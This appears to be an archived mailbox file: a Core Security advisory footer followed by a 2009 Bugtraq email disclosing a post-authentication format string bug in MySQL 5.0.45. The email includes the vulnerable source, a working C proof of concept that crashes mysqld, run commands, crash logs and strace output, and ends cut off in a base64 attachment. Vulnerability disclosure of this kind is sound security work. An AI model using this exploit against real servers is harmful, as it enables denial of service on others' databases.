Core Security Technologies develops strategic solutions that help
security-conscious organizations worldwide develop and maintain a
proactive process for securing their networks. The company's flagship
product, CORE IMPACT, is the most comprehensive product for performing
enterprise security assurance testing. CORE IMPACT evaluates network,
endpoint and end-user vulnerabilities and identifies what resources are
exposed. It enables organizations to determine if current security
investments are detecting and preventing attacks. Core Security
Technologies augments its leading technology solution with world-class
security consulting services, including penetration testing and software
security auditing. Based in Boston, MA and Buenos Aires, Argentina, Core
Security Technologies can be reached at 617-399-6980 or on the Web at
http://www.coresecurity.com.


13. *Disclaimer*

The contents of this advisory are copyright (c) 2009 Core Security
Technologies and (c) 2009 CoreLabs, and may be distributed freely
provided that no fee is charged for this distribution and proper credit
is given.


14. *PGP/GPG Keys*

This advisory has been signed with the GPG key of Core Security
Technologies advisories team, which is available for download at
http://www.coresecurity.com/files/attachments/core_security_advisories.asc.
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.6 (MingW32)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org

iD8DBQFKVR7gyNibggitWa0RAin3AKCOrLLQ8XZnrCLot5d9xoZW6sdWwwCfTJ4N
TPRpR0Gn0WqmF8HOeDslbA8=zEDK
-----END PGP SIGNATURE-----

From - Mon Jul 13 18:03:27 2009
X-Account-Key: account7
X-UIDL: 4909bb8c00008b66
X-Mozilla-Status: 0001
X-Mozilla-Status2: 10000000
Return-Path: <bugtraq-return-40810-lists=securityspace.com@securityfocus.com>
X-Original-To: lists@securityspace.com
Delivered-To: lists@securityspace.com
Received: from outgoing3.securityfocus.com (outgoing.securityfocus.com [205.206.231.27])
by mx.securityspace.com (Postfix) with ESMTP id A11D6ECF37
for <lists@securityspace.com>; Thu,  9 Jul 2009 10:43:49 -0400 (EDT)
Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
by outgoing3.securityfocus.com (Postfix) with QMQP
id CC3C623710B; Thu,  9 Jul 2009 08:38:47 -0600 (MDT)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 25253 invoked from network); 8 Jul 2009 23:01:17 -0000
DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed;
        d=googlemail.com; s=gamma;
        h=domainkey-signature:mime-version:received:date:message-id:subject
         :from:to:content-type;
        bh=0OzsvWvxUS5xTpJ9WpdW7GIVBEitXzOlUSxfA71pFHk=;
        blJJd65isIstXSTCRH1qUi7OWDPH0ivpK47Zrs3oAM69DJCz4gcm/v0GNBjFh5wd4
         xAfHXTqnHAHtVCw+YOdigM2NrSNXWRu0QEbjCW499HeoTlgsH2M2/lnBkfYuBIOYmnWl
         sehke6dOVZeYqr2B7LhOxqlzErtwt8+63LPawDomainKey-Signature: a=rsa-sha1; c=nofws;
        d=googlemail.com; s=gamma;
        h=mime-version:date:message-id:subject:from:to:content-type;
        b=k+5p9vww2qxYKVrU6uCaWkcoPruCr27rhVpO7MGByXn5MB0lVO+us/wDM0xTmzjSy2
         pgFUve2cOEwy1un9QxAqbckF3ZflB8jBJfqc9ZhI+8SVDJrkPVJ6D5c+/oN6jKY5MwvU
         +s5BLSP4I7coENbWNRNmrKnqJjjtpn9FsmKdwMIME-Version: 1.0
Date: Thu, 9 Jul 2009 01:01:16 +0200
Message-ID: <72f8221d0907081601g55bbba3eobcbdb3e0b7474246@mail.gmail.com>
Subject: MySQL <= 5.0.45 post auth format string vulnerability
From: Kingcope <kcope2@googlemail.com>
To: full-disclosure@lists.grok.org.uk, bugtraq@securityfocus.com
Content-Type: multipart/mixed; boundary16364d1d916cb72a046e39b7ea
Status: RO

--0016364d1d916cb72a046e39b7ea
Content-Type: text/plain; charset=ISO-8859-1
Content-Transfer-Encoding: quoted-printable

MySQL (tested: Version 5.0.45 on CentOS (Linux)) Format String Vulnerability
MySQL General Available (GA) Release is vulnerable.
Latest MySQL Version is not vulnerable since the bug if ifdef'ed off.

from mysql-5.0.75 source (mysql-5.0.75.tar.gz) in the file
libmysqld/sql_parse.cc
this source code is also included in mysql-4.0.0, mysql versions >=
4.0.0 are affected.

function prototype: write(THD *thd, enumenum_server_command command,
const char* format, ...)
function call: write(thd, command, packet);

on line 2084:
  case COM_CREATE_DB: // QQ: To be removed
    {
      char *db=thd->strdup(packet), *alias;
      HA_CREATE_INFO create_info;

      statistic_increment(thd->status_var.com_stat[SQLCOM_CREATE_DB],
  &LOCK_status);
      // null test to handle EOM
      if (!db || !(alias= thd->strdup(db)) || check_db_name(db))
      {
my_error(ER_WRONG_DB_NAME, MYF(0), db ? db : "NULL");
break;
      }
      if (check_access(thd,CREATE_ACL,db,0,1,0,is_schema_db(db)))
break;
      [1] mysql_log.write(thd,command,packet);
      bzero(&create_info, sizeof(create_info));
      mysql_create_db(thd, (lower_case_table_names == 2 ? alias : db),
                      &create_info, 0);
      break;
    }

line 2105:
  case COM_DROP_DB: // QQ: To be removed
    {
      statistic_increment(thd->status_var.com_stat[SQLCOM_DROP_DB],
  &LOCK_status);
      char *db=thd->strdup(packet);
      /*  null test to handle EOM */
      if (!db || check_db_name(db))
      {
my_error(ER_WRONG_DB_NAME, MYF(0), db ? db : "NULL");
break;
      }
      if (check_access(thd,DROP_ACL,db,0,1,0,is_schema_db(db)))
break;
      if (thd->locked_tables || thd->active_transaction())
      {
my_message(ER_LOCK_OR_ACTIVE_TRANSACTION,
                   ER(ER_LOCK_OR_ACTIVE_TRANSACTION), MYF(0));
break;
      }
      [2] mysql_log.write(thd,command,db);
      mysql_rm_db(thd, db, 0, 0);
      break;
    }

at [1] and [2] there is a call to mysql_log.write() without
format string specifiers leading to a format string bug.
authentication is required.

COM_CREATE_DB and COM_DROP_DB are "legacy" code. Recent clients
does not use this functions to create and drop databases.
Older clients do. Even Newest GA version of mysqld is able to handle
the requests though.

mysql logging has to be enabled. it seems acls are enforced, so
create db or drop db privs may be required, though untested.
--> my.cnf at [mysqld] log=/var/log/mysql.log for example

PROOF OF CONCEPT WHICH CRASHES MYSQLD FOLLOWS
MYSQLD RESTARTS IMMEDIATELY
CAUSE: SIGNAL SEGV
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

---snip---
#include <stdlib.h>
#include <stdio.h>

#define USE_OLD_FUNCTIONS
#include <mysql/mysql.h>

#define NullS           (char *) 0

int
main (int argc, char **argv)
{
  MYSQL *mysql = NULL;

  mysql = mysql_init (mysql);

  if (!mysql)
    {
      puts ("Init faild, out of memory?");
      return EXIT_FAILURE;
    }

  if (!mysql_real_connect (mysql,       /* MYSQL structure to use */
                           "localhost", /* server hostname or IP address */
                           "monty",      /* mysql user */
                           "montypython",  /* password */
                           NULL,      /* default database to use, NULL
for none */
                           0,   /* port number, 0 for default */
                           NULL,        /* socket file or named pipe name */
                           CLIENT_FOUND_ROWS /* connection flags */ ))
    {
      puts ("Connect failed\n");
    }
  else
    {
      puts ("Connect OK\n");
//      mysql_create_db(mysql, "%s%s%s%s%s");
        simple_command(mysql, COM_CREATE_DB, argv[1], strlen(argv[1]), 0);

    }

  mysql_close (mysql);

  return EXIT_SUCCESS;
}
---snip---

reproduce:
$gcc mysql_format.c -o mysql_format -lmysqlclient
$./mysql_format %s%s%s%s%s


Debugging output follows - Crashdump and strace output

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Version: '5.0.45-log'  socket: '/var/lib/mysql/mysql.sock'  port: 3306
 Source distribution
090620  1:53:52 - mysqld got signal 11;
This could be because you hit a bug. It is also possible that this binary
or one of the libraries it was linked against is corrupt, improperly built,
or misconfigured. This error can also be caused by malfunctioning hardware.
We will try our best to scrape up some info that will hopefully help diagnose
the problem, but since we have already crashed, something is definitely wrong
and this may fail.

key_buffer_size=8388600
read_buffer_size=131072
max_used_connections=1
max_connections=100
threads_connected=1
It is possible that mysqld could use up to
key_buffer_size + (read_buffer_size +
sort_buffer_size)*max_connections = 225791 K
bytes of memory
Hope that's ok; if not, decrease some variables in the equation.

thd=0x8aea8a8
Attempting backtrace. You can use the following information to find out
where mysqld died. If you see no messages after this, something went
terribly wrong...
Cannot determine thread, fp=0xb038d7ec, backtrace may not be correct.
Stack range sanity check OK, backtrace follows:
0x8187393
0xb7be8afb
0x8208dc4
0x81a55e2
0x81a58b7
0x81a6487
0xb7e2a33a
0xb7c4b5ce
New value of fp=(nil) failed sanity check, terminating stack trace!
Please read http://dev.mysql.com/doc/mysql/en/using-stack-trace.html
and follow instructions on how to resolve the stack trace. Resolved
stack trace is much more helpful in diagnosing the problem, so please do
resolve it
Trying to get some variables.
Some pointers may be invalid and cause the dump to abort...
thd->query at (nil)  is invalid pointer
thd->thread_id=1
The manual page at http://www.mysql.com/doc/en/Crashing.html contains
information that should help you find out what is causing the crash.

Number of processes running now: 0
090620 01:53:52  mysqld restarted
090620  1:53:52  InnoDB: Started; log sequence number 0 4876777
090620  1:53:52 [Note] /usr/libexec/mysqld: ready for connections.
Version: '5.0.45-log'  socket: '/var/lib/mysql/mysql.sock'  port: 3306
 Source distribution
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~


26454 futex(0x8a6ff90, FUTEX_WAIT, 1, NULL <unfinished ...>
26453 select(14, [11 13], NULL, NULL, NULL <unfinished ...>
26455 futex(0x8a70000, FUTEX_WAIT, 5, NULL <unfinished ...>
26456 futex(0x8a70070, FUTEX_WAIT, 3, NULL <unfinished ...>
26457 futex(0x8a700e0, FUTEX_WAIT, 1, NULL <unfinished ...>
26459 select(0, NULL, NULL, NULL, {0, 55000} <unfinished ...>
26460 select(0, NULL, NULL, NULL, {0, 953000} <unfinished ...>
26461 futex(0x872a630, FUTEX_WAIT, 1, NULL <unfinished ...>
26462 rt_sigtimedwait([HUP QUIT ALRM TERM TSTP],  <unfinished ...>
26463 futex(0x86e2044, FUTEX_WAIT, 1, NULL <unfinished ...>
26459 <... select resumed> )            = 0 (Timeout)
26459 time(NULL)                        = 1245456538
26459 select(0, NULL, NULL, NULL, {1, 0} <unfinished ...>
26460 <... select resumed> )            = 0 (Timeout)
26460 time(NULL)                        = 1245456538
26460 select(0, NULL, NULL, NULL, {2, 0} <unfinished ...>
26459 <... select resumed> )            = 0 (Timeout)
26459 time(NULL)                        = 1245456539
26459 select(0, NULL, NULL, NULL, {1, 0}) = 0 (Timeout)
26459 time(NULL)                        = 1245456540
26459 select(0, NULL, NULL, NULL, {1, 0} <unfinished ...>
26460 <... select resumed> )            = 0 (Timeout)
26460 time(NULL)                        = 1245456540
26460 select(0, NULL, NULL, NULL, {2, 0} <unfinished ...>
26459 <... select resumed> )            = 0 (Timeout)
26459 time(NULL)                        = 1245456541
26459 select(0, NULL, NULL, NULL, {1, 0}) = 0 (Timeout)
26459 time(NULL)                        = 1245456542
26459 select(0, NULL, NULL, NULL, {1, 0} <unfinished ...>
26460 <... select resumed> )            = 0 (Timeout)
26460 time(NULL)                        = 1245456542
26460 select(0, NULL, NULL, NULL, {2, 0} <unfinished ...>
26459 <... select resumed> )            = 0 (Timeout)
26459 time(NULL)                        = 1245456543
26459 select(0, NULL, NULL, NULL, {1, 0}) = 0 (Timeout)
26459 time(NULL)                        = 1245456544
26459 time(NULL)                        = 1245456544
26459 select(0, NULL, NULL, NULL, {1, 0} <unfinished ...>
26460 <... select resumed> )            = 0 (Timeout)
26460 time(NULL)                        = 1245456544
26460 select(0, NULL, NULL, NULL, {2, 0} <unfinished ...>
26459 <... select resumed> )            = 0 (Timeout)
26459 time(NULL)                        = 1245456545
26459 select(0, NULL, NULL, NULL, {1, 0}) = 0 (Timeout)
26459 time(NULL)                        = 1245456546
26459 select(0, NULL, NULL, NULL, {1, 0} <unfinished ...>
26460 <... select resumed> )            = 0 (Timeout)
26460 time(NULL)                        = 1245456546
26460 select(0, NULL, NULL, NULL, {2, 0} <unfinished ...>
26459 <... select resumed> )            = 0 (Timeout)
26459 time(NULL)                        = 1245456547
26459 select(0, NULL, NULL, NULL, {1, 0} <unfinished ...>
26453 <... select resumed> )            = 1 (in [13])
26453 fcntl64(13, F_SETFL, O_RDWR|O_NONBLOCK) = 0
26453 accept(13, {sa_family=AF_FILE, path=""}, [2]) = 26
26453 fcntl64(13, F_SETFL, O_RDWR)      = 0
26453 getsockname(26, {sa_family=AF_FILE, path="/var/lib/mysql"}, [28]) = 0
26453 fcntl64(26, F_SETFL, O_RDONLY)    = 0
26453 fcntl64(26, F_GETFL)              = 0x2 (flags O_RDWR)
26453 fcntl64(26, F_SETFL, O_RDWR|O_NONBLOCK) = 0
26453 setsockopt(26, SOL_IP, IP_TOS, [8], 4) = -1 EOPNOTSUPP
(Operation not supported)
26453 time(NULL)                        = 1245456547
26453 mmap2(NULL, 200704, PROT_READ|PROT_WRITE,
MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb035e000
26453 mprotect(0xb035e000, 4096, PROT_NONE) = 0
26453 clone(child_stack=0xb038e494,
flags=CLONE_VM|CLONE_FS|CLONE_FILES|CLONE_SIGHAND|CLONE_THREAD|CLONE_SYSVSEM|CLONE_SETTLS|CLONE_PARENT_SETTID|CLONE_CHILD_CLEARTID,
parent_tidptr=0xb038ebd8, {entry_number:6, base_addr:0xb038eb90,
limit:1048575, seg_32bit:1, contents:0, read_exec_only:0,
limit_in_pages:1, seg_not_present:0, useable:1},
child_tidptr=0xb038ebd8) = 16147
26453 select(14, [11 13], NULL, NULL, NULL <unfinished ...>
16147 time(NULL)                        = 1245456547
16147 rt_sigprocmask(SIG_UNBLOCK, [], [HUP INT QUIT PIPE ALRM TERM TSTP], 8) = 0
16147 setsockopt(26, SOL_SOCKET, SO_KEEPALIVE, [1], 4) = 0
16147 write(26, "8\0\0\0\n5.0.45-log\0\1\0\0\0]/mZZ46R\0,\242\300"..., 60) = 60
16147 read(26, 0x8b19ae0, 4)            = -1 EAGAIN (Resource
temporarily unavailable)
16147 time(NULL)                        = 1245456547
16147 rt_sigprocmask(SIG_BLOCK, ~[RTMIN RT_1], [HUP INT QUIT PIPE ALRM
TERM TSTP], 8) = 0
16147 tgkill(26453, 26462, SIGALRM)     = 0
26462 <... rt_sigtimedwait resumed> 0, 0, 8) = 14
16147 rt_sigprocmask(SIG_SETMASK, [HUP INT QUIT PIPE ALRM TERM TSTP],
<unfinished ...>
26462 rt_sigprocmask(SIG_SETMASK, ~[RTMIN RT_1],  <unfinished ...>
16147 <... rt_sigprocmask resumed> NULL, 8) = 0
26462 <... rt_sigprocmask resumed> [HUP INT QUIT PIPE ALRM TERM TSTP], 8) = 0
16147 fcntl64(26, F_SETFL, O_RDWR <unfinished ...>
26462 time( <unfinished ...>
16147 <... fcntl64 resumed> )           = 0
26462 <... time resumed> NULL)          = 1245456547
16147 read(26,  <unfinished ...>
26462 alarm(5)                          = 0
26462 rt_sigprocmask(SIG_SETMASK, [HUP INT QUIT PIPE ALRM TERM TSTP],
NULL, 8) = 0
26462 rt_sigtimedwait([HUP QUIT ALRM TERM TSTP],  <unfinished ...>
16147 <... read resumed> "&\0\0\1", 4)  = 4
16147 read(26, "\207\242\0\0\0\0\0@\10\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0"...,
38) = 38
16147 rt_sigprocmask(SIG_BLOCK, ~[RTMIN RT_1], [HUP INT QUIT PIPE ALRM
TERM TSTP], 8) = 0
16147 rt_sigprocmask(SIG_SETMASK, [HUP INT QUIT PIPE ALRM TERM TSTP],
NULL, 8) = 0
16147 fcntl64(26, F_SETFL, O_RDWR|O_NONBLOCK) = 0
16147 time(NULL)                        = 1245456547
16147 write(3, "090620  2:09:07\t      1 Connect "..., 55) = 55
16147 write(26, "\7\0\0\2\0\0\0\2\0\0\0", 11) = 11
16147 time(NULL)                        = 1245456547
16147 read(26, 0x8b19ae0, 4)            = -1 EAGAIN (Resource
temporarily unavailable)
16147 time(NULL)                        = 1245456547
16147 rt_sigprocmask(SIG_BLOCK, ~[RTMIN RT_1], [HUP INT QUIT PIPE ALRM
TERM TSTP], 8) = 0
16147 tgkill(26453, 26462, SIGALRM)     = 0
16147 rt_sigprocmask(SIG_SETMASK, [HUP INT QUIT PIPE ALRM TERM TSTP],
NULL, 8) = 0
16147 fcntl64(26, F_SETFL, O_RDWR)      = 0
16147 read(26,  <unfinished ...>
26462 <... rt_sigtimedwait resumed> 0, 0, 8) = 14
16147 <... read resumed> "\v\0\0\0", 4) = 4
16147 read(26, "\5%s%s%s%s%s", 11)      = 11
16147 rt_sigprocmask(SIG_BLOCK, ~[RTMIN RT_1], [HUP INT QUIT PIPE ALRM
TERM TSTP], 8) = 0
16147 rt_sigprocmask(SIG_SETMASK, [HUP INT QUIT PIPE ALRM TERM TSTP],
NULL, 8) = 0
16147 fcntl64(26, F_SETFL, O_RDWR|O_NONBLOCK) = 0
16147 time(NULL)                        = 1245456547
16147 --- SIGSEGV (Segmentation fault) @ 0 (0) ---
16147 time(NULL)                        = 1245456547
16147 write(2, "090620  2:09:07 - mysqld got sig"..., 266) = 266
16147 write(2, "We will try our best to scrape u"..., 176) = 176
16147 write(2, "key_buffer_size=8388600\n", 24) = 24
16147 write(2, "read_buffer_size=131072\n", 24) = 24
16147 write(2, "max_used_connections=1\n", 23) = 23
16147 write(2, "max_connections=100\n", 20) = 20
16147 write(2, "threads_connected=1\n", 20) = 20
16147 write(2, "It is possible that mysqld could"..., 143) = 143
16147 write(2, "Hope that\'s ok; if not, decrease"..., 66) = 66
16147 write(2, "thd=0x8aea8a8\n", 14)   = 14
16147 write(2, "Attempting backtrace. You can us"..., 159) = 159
16147 write(2, "Cannot determine thread, fp=0xb0"..., 70) = 70
16147 write(2, "Stack range sanity check OK, bac"..., 48) = 48
16147 write(2, "0x8187393\n", 10)       = 10
16147 write(2, "0xb7be8afb\n", 11)      = 11
16147 write(2, "0x8208dc4\n", 10)       = 10
16147 write(2, "0x81a55e2\n", 10)       = 10
16147 write(2, "0x81a58b7\n", 10)       = 10
16147 write(2, "0x81a6487\n", 10)       = 10
16147 write(2, "0xb7e2a33a\n", 11)      = 11
16147 write(2, "0xb7c4b5ce\n", 11)      = 11
16147 write(2, "New value of fp=(nil) failed san"..., 68) = 68
16147 write(2, "Please read http://dev.mysql.com"..., 222) = 222
16147 write(2, "Trying to get some variables.\nSo"..., 90) = 90
16147 write(2, "thd->query at (nil) ", 20) = 20
16147 write(2, " is invalid pointer\n", 20) = 20
16147 write(2, "thd->thread_id=1\n", 17) = 17
16147 write(2, "The manual page at http://www.my"..., 139) = 139
16147 exit_group(1)                     = ?
26462 rt_sigprocmask(SIG_SETMASK, ~[RTMIN RT_1],  <unfinished ...>
26463 <... futex resumed> )             = -1 EINTR (Interrupted system call)
26459 <... select resumed> )            = ? ERESTARTNOHAND (To be restarted)
26453 <... select resumed> )            = ? ERESTARTNOHAND (To be restarted)
26454 <... futex resumed> )             = -1 EINTR (Interrupted system call)
26455 <... futex resumed> )             = -1 EINTR (Interrupted system call)
26456 <... futex resumed> )             = -1 EINTR (Interrupted system call)
26457 <... futex resumed> )             = -1 EINTR (Interrupted system call)
26461 <... futex resumed> )             = -1 EINTR (Interrupted system call)
26460 <... select resumed> )            = ? ERESTARTNOHAND (To be restarted)
26462 <... rt_sigprocmask resumed> [HUP INT QUIT PIPE ALRM TERM TSTP], 8) = 0

With Kind Regards,

Nikolaos Rangos
E-Mail: kcope[at]googlemail.com

--0016364d1d916cb72a046e39b7ea
Content-Type: text/plain; name="MySQL_Format.txt"
Content-Disposition: attachment; filename="MySQL_Format.txt"
Content-Transfer-Encoding: base64
X-Attachment-Id: f_fwwni97j0

TXlTUUwgKHRlc3RlZDogVmVyc2lvbiA1LjAuNDUgb24gQ2VudE9TIChMaW51eCkpIEZvcm1hdCBT
dHJpbmcgVnVsbmVyYWJpbGl0eQ0KTXlTUUwgR2VuZXJhbCBBdmFpbGFibGUgKEdBKSBSZWxlYXNl
IGlzIHZ1bG5lcmFibGUuDQpMYXRlc3QgTXlTUUwgVmVyc2lvbiBpcyBub3QgdnVsbmVyYWJsZSBz
aW5jZSB0aGUgYnVnIGlmIGlmZGVmJ2VkIG9mZi4NCg0KZnJvbSBteXNxbC01LjAuNzUgc291cmNl
IChteXNxbC01LjAuNzUudGFyLmd6KSBpbiB0aGUgZmlsZSBsaWJteXNxbGQvc3FsX3BhcnNlLmNj
DQp0aGlzIHNvdXJjZSBjb2RlIGlzIGFsc28gaW5jbHVkZWQgaW4gbXlzcWwtNC4wLjAsIG15c3Fs
IHZlcnNpb25zID49IDQuMC4wIGFyZSBhZmZlY3RlZC4NCg0KZnVuY3Rpb24gcHJvdG90eXBlOiB3
cml0ZShUSEQgKnRoZCwgZW51bWVudW1fc2VydmVyX2NvbW1hbmQgY29tbWFuZCwgY29uc3QgY2hh
ciogZm9ybWF0LCAuLi4pIA0KZnVuY3Rpb24gY2FsbDogd3JpdGUodGhkLCBjb21tYW5kLCBwYWNr
ZXQpOw0KDQpvbiBsaW5lIDIwODQ6DQogIGNhc2UgQ09NX0NSRUFURV9EQjoJCQkJLy8gUVE6IFRv
IGJlIHJlbW92ZWQNCiAgICB7DQogICAgICBjaGFyICpkYj10aGQtPnN0cmR1cChwYWNrZXQpLCAq
YWxpYXM7DQogICAgICBIQV9DUkVBVEVfSU5GTyBjcmVhdGVfaW5mbzsNCg0KICAgICAgc3RhdGlz
dGljX2luY3JlbWVudCh0aGQtPnN0YXR1c192YXIuY29tX3N0YXRbU1FMQ09NX0NSRUFURV9EQl0s
DQoJCQkgICZMT0NLX3N0YXR1cyk7DQogICAgICAvLyBudWxsIHRlc3QgdG8gaGFuZGxlIEVPTQ0K
ICAgICAgaWYgKCFkYiB8fCAhKGFsaWFzPSB0aGQtPnN0cmR1cChkYikpIHx8IGNoZWNrX2RiX25h
bWUoZGIpKQ0KICAgICAgew0KCW15X2Vycm9yKEVSX1dST05HX0RCX05BTUUsIE1ZRigwKSwgZGIg
PyBkYiA6ICJOVUxMIik7DQoJYnJlYWs7DQogICAgICB9DQogICAgICBpZiAoY2hlY2tfYWNjZXNz
KHRoZCxDUkVBVEVfQUNMLGRiLDAsMSwwLGlzX3NjaGVtYV9kYihkYikpKQ0KCWJyZWFrOw0KICAg
ICAgWzFdIG15c3FsX2xvZy53cml0ZSh0aGQsY29tbWFuZCxwYWNrZXQpOw0KICAgICAgYnplcm8o
JmNyZWF0ZV9pbmZvLCBzaXplb2YoY3JlYXRlX2luZm8pKTsNCiAgICAgIG15c3FsX2NyZWF0ZV9k
Yih0aGQsIChsb3dlcl9jYXNlX3RhYmxlX25hbWVzID09IDIgPyBhbGlhcyA6IGRiKSwNCiAgICAg
ICAgICAgICAgICAgICAgICAmY3JlYXRlX2luZm8sIDApOw0KICAgICAgYnJlYWs7DQogICAgfQ0K
DQpsaW5lIDIxMDU6DQogIGNhc2UgQ09NX0RST1BfREI6CQkJCS8vIFFROiBUbyBiZSByZW1vdmVk
DQogICAgew0KICAgICAgc3RhdGlzdGljX2luY3JlbWVudCh0aGQtPnN0YXR1c192YXIuY29tX3N0
YXRbU1FMQ09NX0RST1BfREJdLA0KCQkJICAmTE9DS19zdGF0dXMpOw0KICAgICAgY2hhciAqZGI9
dGhkLT5zdHJkdXAocGFja2V0KTsNCiAgICAgIC8qICBudWxsIHRlc3QgdG8gaGFuZGxlIEVPTSAq
Lw0KICAgICAgaWYgKCFkYiB8fCBjaGVja19kYl9uYW1lKGRiKSkNCiAgICAgIHsNCglteV9lcnJv
cihFUl9XUk9OR19EQl9OQU1FLCBNWUYoMCksIGRiID8gZGIgOiAiTlVMTCIpOw0KCWJyZWFrOw0K
ICAgICAgfQ0KICAgICAgaWYgKGNoZWNrX2FjY2Vzcyh0aGQsRFJPUF9BQ0wsZGIsMCwxLDAsaXNf
c2NoZW1hX2RiKGRiKSkpDQoJYnJlYWs7DQogICAgICBpZiAodGhkLT5sb2NrZWRfdGFibGVzIHx8
IHRoZC0+YWN0aXZlX3RyYW5zYWN0aW9uKCkpDQogICAgICB7DQoJbXlfbWVzc2FnZShFUl9MT0NL
X09SX0FDVElWRV9UUkFOU0FDVElPTiwNCiAgICAgICAgICAgICAgICAgICBFUihFUl9MT0NLX09S
X0FDVElWRV9UUkFOU0FDVElPTiksIE1ZRigwKSk7DQoJYnJlYWs7DQogICAgICB9DQogICAgICBb
Ml0gbXlzcWxfbG9nLndyaXRlKHRoZCxjb21tYW5kLGRiKTsgDQogICAgICBteXNxbF9ybV9kYih0
aGQsIGRiLCAwLCAwKTsNCiAgICAgIGJyZWFrOw0KICAgIH0NCg0KYXQgWzFdIGFuZCBbMl0gdGhl
cmUgaXMgYSBjYWxsIHRvIG15c3FsX2xvZy53cml0ZSgpIHdpdGhvdXQgDQpmb3JtYXQgc3RyaW5n
IHNwZWNpZmllcnMgbGVhZGluZyB0byBhIGZvcm1hdCBzdHJpbmcgYnVnLg0KYXV0aGVudGljYXRp
b24gaXMgcmVxdWlyZWQuDQoNCkNPTV9DUkVBVEVfREIgYW5kIENPTV9EUk9QX0RCIGFyZSAibGVn
YWN5IiBjb2RlLiBSZWNlbnQgY2xpZW50cw0KZG9lcyBub3QgdXNlIHRoaXMgZnVuY3Rpb25zIHRv
IGNyZWF0ZSBhbmQgZHJvcCBkYXRhYmFzZXMuDQpPbGRlciBjbGllbnRzIGRvLiBFdmVuIE5ld2Vz
dCBHQSB2ZXJzaW9uIG9mIG15c3FsZCBpcyBhYmxlIHRvIGhhbmRsZQ0KdGhlIHJlcXVlc3RzIHRo
b3VnaC4NCiAgICANCm15c3FsIGxvZ2dpbmcgaGFzIHRvIGJlIGVuYWJsZWQuIGl0IHNlZW1zIGFj
bHMgYXJlIGVuZm9yY2VkLCBzbw0KY3JlYXRlIGRiIG9yIGRyb3AgZGIgcHJpdnMgbWF5IGJlIHJl
cXVpcmVkLCB0aG91Z2ggdW50ZXN0ZWQuDQotLT4gbXkuY25mIGF0IFtteXNxbGRdIGxvZz0vdmFy
L2xvZy9teXNxbC5sb2cgZm9yIGV4YW1wbGUNCg0KUFJPT0YgT0YgQ09OQ0VQVCBXSElDSCBDUkFT
SEVTIE1ZU1FMRCBGT0xMT1dTDQpNWVNRTEQgUkVTVEFSVFMgSU1NRURJQVRFTFkNCkNBVVNFOiBT
SUdOQUwgU0VHVg0Kfn5+fn5+fn5+fn5+fn5+fn5+fn5+fn5+fn5+fn5+fn5+fn5+fn5+fn5+fn5+
fn5+fn5+fn5+fn5+fn5+fn5+fn5+fn5+fn5+fn5+fn5+DQoNCi0tLXNuaXAtLS0NCiNpbmNsdWRl
IDxzdGRsaWIuaD4NCiNpbmNsdWRlIDxzdGRpby5oPg0KDQojZGVmaW5lIFVTRV9PTERfRlVOQ1RJ
T05TDQojaW5jbHVkZSA8bXlzcWwvbXlzcWwuaD4NCg0KI2RlZmluZSBOdWxsUyAgICAgICAgICAg
KGNoYXIgKikgMA0KDQppbnQNCm1haW4gKGludCBhcmdjLCBjaGFyICoqYXJndikNCnsNCiAgTVlT
UUwgKm15c3FsID0gTlVMTDsNCg0KICBteXNxbCA9IG15c3FsX2luaXQgKG15c3FsKTsNCg0KICBp
ZiAoIW15c3FsKQ0KICAgIHsNCiAgICAgIHB1dHMgKCJJbml0IGZhaWxkLCBvdXQgb2YgbWVtb3J5
PyIpOw0KICAgICAgcmV0dXJuIEVYSVRfRkFJTFVSRTsNCiAgICB9DQoNCiAgaWYgKCFteXNxbF9y
ZWFsX2Nvbm5lY3QgKG15c3FsLCAgICAgICAvKiBNWVNRTCBzdHJ1Y3R1cmUgdG8gdXNlICovDQog
ICAgICAgICAgICAgICAgICAgICAgICAgICAibG9jYWxob3N0IiwgLyogc2VydmVyIGhvc3RuYW1l
IG9yIElQIGFkZHJlc3MgKi8NCiAgICAgICAgICAgICAgICAgICAgICAgICAgICJtb250eSIsICAg
ICAgLyogbXlzcWwgdXNlciAqLw0KICAgICAgICAgICAgICAgICAgICAgICAgICAgIm1vbnR5cHl0
aG9uIiwgIC8qIHBhc3N3b3JkICovDQogICAgICAgICAgICAgICAgICAgICAgICAgICBOVUxMLCAg
ICAgIC8qIGRlZmF1bHQgZGF0YWJhc2UgdG8gdXNlLCBOVUxMIGZvciBub25lICovDQogICAgICAg
ICAgICAgICAgICAgICAgICAgICAwLCAgIC8qIHBvcnQgbnVtYmVyLCAwIGZvciBkZWZhdWx0ICov
DQogICAgICAgICAgICAgICAgICAgICAgICAgICBOVUxMLCAgICAgICAgLyogc29ja2V0IGZpbGUg
b3IgbmFtZWQgcGlwZSBuYW1lICovDQogICAgICAgICAgICAgICAgICAgICAgICAgICBDTElFTlRf
Rk9VTkRfUk9XUyAvKiBjb25uZWN0aW9uIGZsYWdzICovICkpDQogICAgew0KICAgICAgcHV0cyAo
IkNvbm5lY3QgZmFpbGVkXG4iKTsNCiAgICB9DQogIGVsc2UNCiAgICB7DQogICAgICBwdXRzICgi
Q29ubmVjdCBPS1xuIik7DQovLyAgICAgIG15c3FsX2NyZWF0ZV9kYihteXNxbCwgIiVzJXMlcyVz
JXMiKTsNCiAgICAgICAgc2ltcGxlX2NvbW1hbmQobXlzcWwsIENPTV9DUkVBVEVfREIsIGFyZ3Zb
